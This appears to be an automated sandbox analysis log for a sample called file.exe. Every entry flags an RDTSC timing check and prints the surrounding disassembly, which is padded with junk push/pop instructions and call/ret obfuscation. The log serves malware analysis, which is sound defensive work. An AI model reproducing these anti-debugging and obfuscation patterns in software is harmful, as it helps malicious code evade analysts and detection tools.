                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684D26 second address: 684D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 684E97 second address: 684EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FBF78ADB276h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 685190 second address: 6851A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FBF78E7B35Ah 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6851A6 second address: 6851D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB280h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBF78ADB281h 0x00000011 jnc 00007FBF78ADB276h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 685368 second address: 68536C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 688C2C second address: 5018F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF78ADB27Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 5B82BE00h 0x00000011 jg 00007FBF78ADB279h 0x00000017 movzx esi, bx 0x0000001a push dword ptr [ebp+122D0971h] 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FBF78ADB278h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a call dword ptr [ebp+122D32F9h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D27BBh], eax 0x00000047 clc 0x00000048 xor eax, eax 0x0000004a jmp 00007FBF78ADB27Bh 0x0000004f or dword ptr [ebp+122D32DEh], esi 0x00000055 mov edx, dword ptr [esp+28h] 0x00000059 jmp 00007FBF78ADB286h 0x0000005e mov dword ptr [ebp+122D366Ah], eax 0x00000064 jg 00007FBF78ADB281h 0x0000006a pushad 0x0000006b or dword ptr [ebp+122D27BBh], ecx 0x00000071 movzx eax, ax 0x00000074 popad 0x00000075 mov esi, 0000003Ch 0x0000007a jmp 00007FBF78ADB282h 0x0000007f add esi, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D1C60h], edx 0x00000089 lodsw 0x0000008b mov dword ptr [ebp+122D32DEh], edi 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 cmc 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a mov dword ptr [ebp+122D27BBh], edi 0x000000a0 nop 0x000000a1 pushad 0x000000a2 pushad 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688DEE second address: 688E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Fh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FBF78E7B358h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D27BBh], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FBF78E7B358h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov edi, dword ptr [ebp+122D352Ah] 0x00000050 clc 0x00000051 push B59AAAA4h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FBF78E7B35Bh 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68906C second address: 689070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689070 second address: 68907A instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68907A second address: 689097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FBF78ADB27Eh 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689097 second address: 6890BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FBF78E7B367h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6890BD second address: 6890F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78ADB27Ch 0x00000008 jnl 00007FBF78ADB276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 ja 00007FBF78ADB285h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBF78ADB27Bh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6890F7 second address: 689101 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBF78E7B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8A8D second address: 6A8AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF78ADB27Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8AA0 second address: 6A8AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8AA6 second address: 6A8AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FBF78ADB283h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8AC8 second address: 6A8ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8ACE second address: 6A8AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF78ADB276h 0x0000000a popad 0x0000000b jl 00007FBF78ADB27Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6B17 second address: 6A6B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FBF78E7B358h 0x0000000f popad 0x00000010 jl 00007FBF78E7B366h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6B41 second address: 6A6B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6CBE second address: 6A6CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6CCF second address: 6A6CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73DB second address: 6A73ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73ED second address: 6A73F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73F1 second address: 6A73F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7539 second address: 6A7547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FBF78ADB276h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7547 second address: 6A7564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FBF78E7B363h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B58 second address: 6A7B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB287h 0x00000008 jbe 00007FBF78ADB276h 0x0000000e popad 0x0000000f js 00007FBF78ADB27Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BED4 second address: 69BF0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007FBF78E7B356h 0x00000015 jmp 00007FBF78E7B367h 0x0000001a popad 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BF0D second address: 69BF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF78ADB276h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66FFF5 second address: 66FFFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A83EB second address: 6A840A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF78ADB276h 0x0000000a jmp 00007FBF78ADB284h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D528 second address: 67D52E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACCE0 second address: 6ACCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78ADB280h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ABB2B second address: 6ABB35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD383 second address: 6AD388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B33CD second address: 6B33DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBF78E7B356h 0x00000009 jns 00007FBF78E7B356h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2A2A second address: 6B2A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3046 second address: 6B304A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B304A second address: 6B3050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3050 second address: 6B3068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B362h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B31BC second address: 6B31E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FBF78ADB27Eh 0x0000000e jmp 00007FBF78ADB283h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B31E5 second address: 6B3213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78E7B366h 0x00000008 jmp 00007FBF78E7B363h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6067 second address: 6B6075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF78ADB276h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B613F second address: 6B6176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnc 00007FBF78E7B35Eh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FBF78E7B35Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007FBF78E7B35Ch 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B67C7 second address: 6B67D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B69F0 second address: 6B69F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B69F6 second address: 6B69FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6F68 second address: 6B6F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6F6C second address: 6B6FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FBF78ADB284h 0x0000000d xchg eax, ebx 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FBF78ADB278h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007FBF78ADB27Ah 0x0000002d or edi, 63ACF006h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jbe 00007FBF78ADB27Ch 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6FC8 second address: 6B6FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7401 second address: 6B7405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7560 second address: 6B756A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B756A second address: 6B7578 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7578 second address: 6B757C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8486 second address: 6B848B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B848B second address: 6B8491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8491 second address: 6B8495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B94A5 second address: 6B94A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B94A9 second address: 6B94BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B94BF second address: 6B94DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78E7B35Eh 0x00000008 ja 00007FBF78E7B356h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAB8D second address: 6BABA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABA5 second address: 6BABAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABAF second address: 6BAC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78ADB276h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+1246151Eh], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FBF78ADB278h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f je 00007FBF78ADB276h 0x00000035 mov edi, eax 0x00000037 push 00000000h 0x00000039 add esi, 5645BAD5h 0x0000003f xchg eax, ebx 0x00000040 pushad 0x00000041 jo 00007FBF78ADB278h 0x00000047 push eax 0x00000048 pop eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jo 00007FBF78ADB276h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAC07 second address: 6BAC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAC15 second address: 6BAC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAC19 second address: 6BAC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB6C3 second address: 6BB718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FBF78ADB278h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D30B6h], ecx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 mov edi, 53DCF6B5h 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC1BC second address: 6BC1E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FBF78E7B369h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFABE second address: 6BFAC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFAC2 second address: 6BFAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFAC8 second address: 6BFACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFACE second address: 6BFAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB450 second address: 6BB462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF78ADB27Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0F60 second address: 6C0F65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C01D7 second address: 6C01DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0F65 second address: 6C0FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FBF78E7B35Fh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FBF78E7B358h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 or dword ptr [ebp+122D186Fh], edx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FBF78E7B358h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov di, cx 0x0000004d push 00000000h 0x0000004f cmc 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 jmp 00007FBF78E7B367h 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C01DF second address: 6C01E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FE9 second address: 6C0FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FEF second address: 6C0FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C11EC second address: 6C11F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C45BE second address: 6C45C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C55BD second address: 6C55CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
